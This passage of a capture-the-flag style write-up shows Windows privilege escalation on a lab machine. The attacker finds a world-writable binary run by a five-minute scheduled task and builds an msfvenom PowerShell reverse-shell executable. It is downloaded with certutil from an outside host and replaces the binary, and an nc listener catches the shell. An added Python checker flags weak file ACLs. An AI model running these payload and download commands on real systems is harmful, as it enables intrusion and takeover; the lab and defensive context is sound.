<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FlTNxbGi4S2sjm2pAbWq7%2FPasted%20image%2020230304232414.png?alt=media&#x26;token=d85e2338-fd8b-4394-aaa9-6e8a34081252" alt=""><figcaption></figcaption></figure>

When we run it, we see that we get a better `cmd`:

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfYSpjsPDpp5562WNLYb0%2FPasted%20image%2020230304232432.png?alt=media&#x26;token=23810abf-cd67-4fb0-a908-ae1bfee03b74" alt=""><figcaption></figcaption></figure>

## Privilege escalation

Before resorting to automated enumeration, we take a quick look around the system and do some manual enumeration.

### Scheduled task every 5 minutes

Under `C:\` we see a `Backup` folder. Looking at the information in its files, we see that an EXE is run every 5 minutes.

```
cd C:\ && dir
cd Backup && dir
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfjCKLhAdFn50BtblvNFi%2FPasted%20image%2020230304232725.png?alt=media&#x26;token=1b659609-0dbb-44a7-8d21-22a3b0feb6bf" alt=""><figcaption></figcaption></figure>

### Binary with write permissions

```
type backup.txt
type info.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfR3gnEn9VjxcYDED1lUR%2FPasted%20image%2020230304233153.png?alt=media&#x26;token=7b5bb222-4786-4cc1-be82-1cd3e0622faa" alt=""><figcaption></figcaption></figure>

Let's check the permissions on that executable, in case we have write permission and can replace it with an executable of our own.

```
powershell -c "Get-Acl TFTP.exe | fl"
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FDcbPba13ivhNzwwVgn0x%2FPasted%20image%2020230304233838.png?alt=media&#x26;token=1eff578d-29ab-4e57-9df7-24f5f549ae36" alt=""><figcaption></figcaption></figure>
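What makes the escalation possible is the combination seen in the last two sections: a binary run by a scheduled task every 5 minutes, and an ACL on that binary that lets a low-privileged principal replace it. The following is an added example (Python, not part of the original write-up) that parses `Get-Acl <file> | Format-List` output of the kind shown above and reports every principal other than SYSTEM, Administrators and TrustedInstaller that holds write-capable rights or owns the file. Both ACL samples are constructed: the computer name `SLORT` and the access entries are placeholders, not the machine's real permissions.

```python
import re

# Principals that legitimately hold write access to a binary launched by a
# privileged scheduled task. Anything else with write rights is a finding.
PRIVILEGED_PRINCIPALS = {
    r"NT AUTHORITY\SYSTEM",
    r"BUILTIN\Administrators",
    r"NT SERVICE\TrustedInstaller",
}

# FileSystemRights values that allow replacing, altering or renaming the file
# (Delete is included because a rename-then-replace, as done above, needs it).
WRITE_RIGHTS = {
    "FullControl", "Modify", "Write", "WriteData", "AppendData",
    "Delete", "TakeOwnership", "ChangePermissions",
}

# One "Name : value" field of Format-List output; continuation lines are indented.
FIELD = re.compile(r"^(?P<key>\w+)\s*:\s?(?P<value>.*)$")
# One access-control entry as Format-List renders it: identity, Allow/Deny, rights.
ACE = re.compile(r"^(?P<identity>.+?)\s+(?P<type>Allow|Deny)\s+(?P<rights>.+?)\s*$")


def parse_format_list(text):
    """Turn `Get-Acl <file> | Format-List` output into {field: [line, ...]}."""
    fields, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = FIELD.match(raw)  # only unindented lines start a new field
        if m:
            current = m.group("key")
            fields[current] = [m.group("value")] if m.group("value") else []
        elif current is not None:
            fields[current].append(raw.strip())
    return fields


def writable_by_unprivileged(acl_text):
    """Report who, other than the privileged principals, can modify the file.

    Returns a list of (principal, rights) tuples. The owner is reported too,
    because an owner can always regrant itself permissions and then full control.
    Deny ACEs are ignored, so the result errs on the side of over-reporting.
    """
    fields = parse_format_list(acl_text)
    findings = []
    owner = (fields.get("Owner") or [""])[0]
    if owner and owner not in PRIVILEGED_PRINCIPALS:
        findings.append((owner, "Owner"))
    for entry in fields.get("Access", []):
        m = ACE.match(entry)
        if not m or m.group("type") != "Allow":
            continue
        principal = m.group("identity")
        rights = {r.strip() for r in m.group("rights").split(",")}
        risky = rights & WRITE_RIGHTS
        if principal not in PRIVILEGED_PRINCIPALS and risky:
            findings.append((principal, ", ".join(sorted(risky))))
    return findings


# Constructed Get-Acl | Format-List output for C:\Backup\TFTP.exe. The entries
# are hypothetical and "SLORT" is a placeholder computer name.
WEAK_ACL = r"""
Path   : Microsoft.PowerShell.Core\FileSystem::C:\Backup\TFTP.exe
Owner  : BUILTIN\Administrators
Group  : SLORT\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  Modify, Synchronize
         SLORT\rupert Allow  ReadAndExecute, Synchronize
Audit  :
"""

# The same file after the ACL is corrected: unprivileged users can only read and run it.
FIXED_ACL = r"""
Path   : Microsoft.PowerShell.Core\FileSystem::C:\Backup\TFTP.exe
Owner  : BUILTIN\Administrators
Group  : SLORT\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
Audit  :
"""

if __name__ == "__main__":
    for name, acl in (("weak", WEAK_ACL), ("fixed", FIXED_ACL)):
        print(name, writable_by_unprivileged(acl) or "no unprivileged write access")
```

To use it on a real host, save the `Get-Acl ... | Format-List` output to a file and pass its contents to `writable_by_unprivileged`. A hit such as `BUILTIN\Users` with `Modify` is closed by reducing that entry to `ReadAndExecute`, or by having the task run the binary from a directory that only administrators can write to; running the same check over every scheduled task's action path is the systematic version of what the write-up found by hand.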

### Creating the malicious binary

Since we have permission to modify the file, we create a file called `TFTP.exe` with `msfvenom` containing our reverse shell, and then swap it for the one on the system.

```
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o TFTP.exe
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FdGsMws0orH0i4dQmnXwt%2FPasted%20image%2020230304234405.png?alt=media&#x26;token=8c68a613-aaa5-4b88-b510-32c148feb914" alt=""><figcaption></figcaption></figure>

### Replacing and uploading the malicious binary

On the victim machine, we rename `TFTP.exe` to `TFTP.exe.bak` so as not to delete it, and download our malicious EXE.

```
move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FVsAzptT3AQrKPLoGHKa6%2FPasted%20image%2020230304234529.png?alt=media&#x26;token=d8bf58f4-47ae-4631-8c21-eb13c72d39d7" alt=""><figcaption></figcaption></figure>

Remember to close the `python` HTTP server used to download the EXE, and start listening on port 80 to receive our shell:

```
sudo rlwrap nc -lnvp 80
```

We wait 5 minutes and... PWNED!

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FSSnTsleDMC79txdfPNoq%2FPasted%20image%2020230304235043.png?alt=media&#x26;token=a93e65cc-1459-4c2c-9315-2632e7eec478" alt=""><figcaption></figcaption></figure>

```
type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
```
